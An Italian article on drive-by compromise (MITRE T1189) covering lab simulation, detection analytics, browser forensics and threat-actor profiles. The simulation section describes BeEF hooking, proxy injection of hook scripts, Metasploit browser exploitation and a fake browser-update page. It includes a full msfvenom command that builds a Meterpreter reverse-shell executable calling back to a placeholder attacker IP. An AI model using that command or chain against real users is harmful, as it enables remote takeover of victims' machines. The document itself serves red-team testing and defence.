Drive-by Compromise: Quando il Browser Diventa la Porta d'Ingresso (T1189)

Simulare un drive-by compromise in laboratorio richiede due componenti: un'infrastruttura web che profili il browser della vittima e un payload che sfrutti una vulnerabilità o induca l'utente a un'azione. Il modo più diretto per allestire il primo componente è BeEF — Browser Exploitation Framework (open source), che trasforma un semplice hook JavaScript in un pannello di controllo completo sul browser della vittima.

Si parte avviando BeEF sul proprio server d'attacco e iniettando il tag hook in una pagina HTML controllata. Una volta che il target visita la pagina, il browser viene "agganciato" e compare nella dashboard. Da lì è possibile lanciare moduli di ricognizione — fingerprint del browser, enumerazione dei plugin, rilevamento della rete interna tramite WebRTC — e moduli di exploitation che tentano di forzare il download o l'esecuzione di payload.

Per replicare uno scenario watering hole più realistico, si può combinare BeEF con Evilginx2 (open source) o con un semplice reverse proxy NGINX che inietta il tag hook nelle risposte HTML di un sito clonato. La catena diventa: vittima visita il sito clonato → il proxy inietta lo script → BeEF profila il browser → il modulo exploitation consegna il payload.

Sul lato payload, Metasploit Framework (open source) offre il modulo exploit/multi/browser/browser_autopwn2 che automatizza la selezione dell'exploit corretto in base alla versione del browser rilevata. In alternativa, per scenari che simulano il social engineering via fake update — come fa il malware SocGholish secondo i dati di campagna — si può allestire una landing page con un finto aggiornamento del browser che serve un eseguibile generato con msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_ATTACCANTE> LPORT=443 -f exe -o update.exe

Per il profiling JavaScript lato client, ispirato al tool RICECURRY usato da APT37, si può scrivere un semplice script che raccoglie navigator.userAgent, la lista dei plugin attivi via navigator.plugins, la risoluzione dello schermo e l'indirizzo IP interno tramite WebRTC, inviando il tutto a un endpoint controllato dall'operatore. Questo consente di consegnare l'exploit solo ai target che rientrano nel profilo desiderato, riducendo l'esposizione dell'infrastruttura.

Infine, per testare le difese contro il malvertising, Gophish (open source) permette di orchestrare campagne che reindirizzano a landing page controllate, misurando quanti utenti arrivano alla pagina e quanti eseguono il payload. Non è un ad network, ma simula efficacemente il flusso click → redirect → exploit page.

La detection di un drive-by compromise richiede correlazione multi-sorgente: il singolo evento — una connessione HTTP, un processo figlio del browser — è quasi sempre benigno se considerato in isolamento. La chiave è la catena temporale: richiesta verso dominio insolito, seguita entro pochi minuti da comportamento anomalo dell'endpoint.

Su Windows, le analitiche di detection (AN0498) indicano di correlare i log Sysmon con i flussi di rete. L'EventCode 1 (Process Create) diventa significativo quando il processo padre è un browser — chrome.exe, msedge.exe, firefox.exe — e il processo figlio è un interprete di scripting (powershell.exe, cmd.exe, wscript.exe, mshta.exe) o un binario non firmato. L'EventCode 3 (Network Connection) dallo stesso browser verso un dominio mai visto nell'ambiente, combinato con l'EventCode 11 (File Create) in directory temporanee, completa il trittico. La finestra di correlazione consigliata è di 2 minuti tra il fetch sospetto e l'evento endpoint.

Su Linux (AN0499), il focus si sposta sui log auditd — in particolare le syscall execve originate da processi browser — e sui file scritti in /tmp o /dev/shm poco dopo una connessione HTTP anomala registrata da Zeek o dal proxy. Su macOS (AN0500), i Unified Log catturano crash di WebKit o caricamenti di estensioni non autorizzate che seguono fetch di risorse JavaScript offuscate.

Per ridurre i falsi positivi, tre parametri di tuning sono fondamentali:

• KnownGoodDomainsList: un'allowlist dei domini CDN e corporate ad alto volume che l'ambiente usa legittimamente. Senza di essa, ogni aggiornamento di libreria jQuery da un CDN pubblico genererà rumore.
• PayloadEntropyThreshold: una soglia di entropia sul contenuto scaricato (script o binari) per far emergere payload offuscati o packed. Valori sopra 7.2 su scala Shannon meritano investigazione.
• UserContext: escludere o trattare diversamente gli account di servizio, le macchine di build e gli ambienti CI/CD dove l'esecuzione di interpreti da contesto browser-like è attesa.

Sul piano dell'identity provider (AN0501), dopo un drive-by riuscito l'attaccante potrebbe riutilizzare token di sessione rubati. Monitorare i log Azure Sign-In e M365 Unified Audit per riuso di refresh token da IP nuovi, consent grant verso OAuth client non approvati, o bypass MFA anomali entro 30 minuti - 2 ore dall'alert endpoint è una detection di secondo livello che cattura la fase di lateral movement post-compromissione.

Come controlli preventivi, il deploy di browser sandboxing nativo (Chrome e Edge lo abilitano di default), il blocco dell'esecuzione JavaScript non necessaria tramite estensioni di script-blocking, il filtraggio DNS e il blocco delle notifiche push del browser tramite Group Policy rappresentano le contromisure a più alto rendimento.

La ricostruzione forense di un drive-by compromise parte dal browser e si estende all'endpoint. Il primo artefatto da acquisire è la cronologia di navigazione: su Chrome i file History e Top Sites nel profilo utente (database SQLite) contengono URL, timestamp e conteggio visite. Su Firefox, il file places.sqlite offre le stesse informazioni. La correlazione tra l'ultima visita a un sito sospetto e il primo evento anomalo sull'endpoint stabilisce il punto di ingresso.

Il secondo artefatto critico è la cache del browser. I file in cache possono contenere la copia del JavaScript malevolo iniettato nel sito legittimo — inclusi eventuali iframe nascosti come quello usato nella campagna 3CX Supply Chain Attack (C0057), dove un iframe nascosto sul sito di Trading Technologies anticipò di due mesi la distribuzione del pacchetto X_TRADER compromesso. La cache di Chrome si trova nella directory Cache/Cache_Data del profilo, e tool come Hindsight (open source) la parsano estraendo contenuto e metadati HTTP.

Su Windows, i Prefetch (directory C:\Windows\Prefetch) documentano l'esecuzione di processi sospetti avviati dal browser. Se il drive-by ha consegnato un eseguibile mascherato da aggiornamento — schema tipico di SocGholish e Mustard Tempest — il file .pf corrispondente conterrà il timestamp di prima esecuzione e i file referenziati. Gli Amcache e ShimCache confermano l'esecuzione e forniscono l'hash SHA1 del binario.

Per la componente di rete, i log del proxy o i PCAP catturati da Zeek rivelano la sequenza di redirect: il sito legittimo compromesso → l'eventuale traffic distribution system (TDS) → la landing page con l'exploit kit. Nella campagna Operation Dust Storm (C0016), il watering hole su un rivenditore software sfruttava la vulnerabilità zero-day CVE-2014-0322 in Internet Explorer, e la catena di redirect era ricostruibile dai log del proxy aziendale. Nella campagna C0010, il watering hole risiedeva sulla pagina di login di una compagnia navale israeliana.

Su Linux e macOS, gli artefatti chiave sono i file scritti in /tmp e /var/folders subito dopo la sessione browser, i log di auditd con le syscall execve che mostrano la catena di processo dal browser all'interprete malevolo, e i Unified Log di macOS che registrano crash di WebKit o caricamenti di dylib anomali.

Per la costruzione della timeline, Plaso/log2timeline (open source) ingesta simultaneamente cronologia browser, prefetch, log di evento Windows, e log di rete Zeek, producendo una super-timeline ordinata cronologicamente che rende visibile la sequenza: visita al sito → download del payload → esecuzione → primo callback C2.

Il drive-by compromise è una tecnica trasversale che attraversa confini geopolitici e settoriali, ma i 31 gruppi che la impiegano mostrano pattern operativi distinguibili.

APT28 (Russia) rappresenta l'uso più sofisticato della tecnica: strategic web compromise con exploit kit personalizzati e reflected XSS contro siti governativi per redirigere verso pagine di phishing. Questo doppio uso — exploit tecnico e social engineering — è una firma operativa che lo distingue da altri gruppi. La combinazione con campagne di spearphishing indica un modello di accesso iniziale ridondante, dove il watering hole è il piano B quando il phishing diretto fallisce.

Lazarus Group (Corea del Nord) e il cluster collegato ad APT38 usano i watering hole primariamente per colpire il settore finanziario e crypto. La campagna 3CX Supply Chain Attack (C0057) mostra un'evoluzione significativa: un iframe nascosto su un sito di trading ha preceduto di due mesi la compromissione della supply chain, suggerendo che il watering hole serviva come vettore di ricognizione e accesso iniziale prima dell'attacco principale. Andariel, sub-cluster Lazarus, aggiunge zero-day exploit e filtraggio per range IP, un livello di targeting chirurgico.

Il cluster Asia-Pacifico — APT32 (Vietnam), APT37 (Corea del Nord), BRONZE BUTLER (Cina), Leviathan (Cina), Earth Lusca (Cina), Daggerfly (Cina) — mostra una preferenza marcata per watering hole settoriali. APT37 si distingue per l'uso del profiler JavaScript RICECURRY che seleziona le vittime in base al browser, e per la distribuzione via torrent di malware come KARAE e POORAIM, una tattica più indiscriminata che affianca il watering hole mirato.

Il cluster Medio Oriente-Iran — Magic Hound, CURIUM, Leafminer — usa watering hole su siti media e magazine, con CURIUM che ha distribuito IMAPLoader tramite compromissione di siti strategici. La campagna C0010 di UNC3890, con watering hole sulla pagina login di una compagnia navale israeliana, conferma il focus iraniano su infrastrutture critiche israeliane.

Sul fronte cybercrime, Mustard Tempest e SocGholish operano con un modello diverso: compromissione massiva di siti legittimi, distribuzione indiscriminata tramite fake browser update, e monetizzazione tramite accesso iniziale rivenduto ad altri operatori ransomware come REvil. RTM usava i kit exploit RIG e SUNDOWN insieme alla rete pubblicitaria Yandex.Direct, combinando exploit kit e malvertising. Grandoreiro sfrutta sia siti compromessi sia Google Ads per distribuire il suo installer, un pattern di malvertising che sta diventando dominante nell'ecosistema crimeware.

Il trend emergente è la convergenza tra watering hole e supply chain: la campagna 3CX dimostra che il drive-by compromise può essere il primo anello di una catena che porta alla compromissione di build pipeline e distribuzione di software trojanizzato a centinaia di migliaia di utenti.

Framework MITRE ATT&CK v16 — Tecnica T1189 (Drive-by Compromise), Tattica TA0001 (Initial Access). Campagne: C0057 (3CX Supply Chain Attack), C0016 (Operation Dust Storm), C0010. Mitigazioni: M1050, M1051, M1048, M1021, M1017. Detection: DET0176, analitiche AN0498–AN0501. Tool di detection e simulazione: BeEF, Metasploit Framework, Hindsight, Plaso/log2timeline, Gophish, Zeek. Integrato con conoscenza professionale per tool e procedure operative.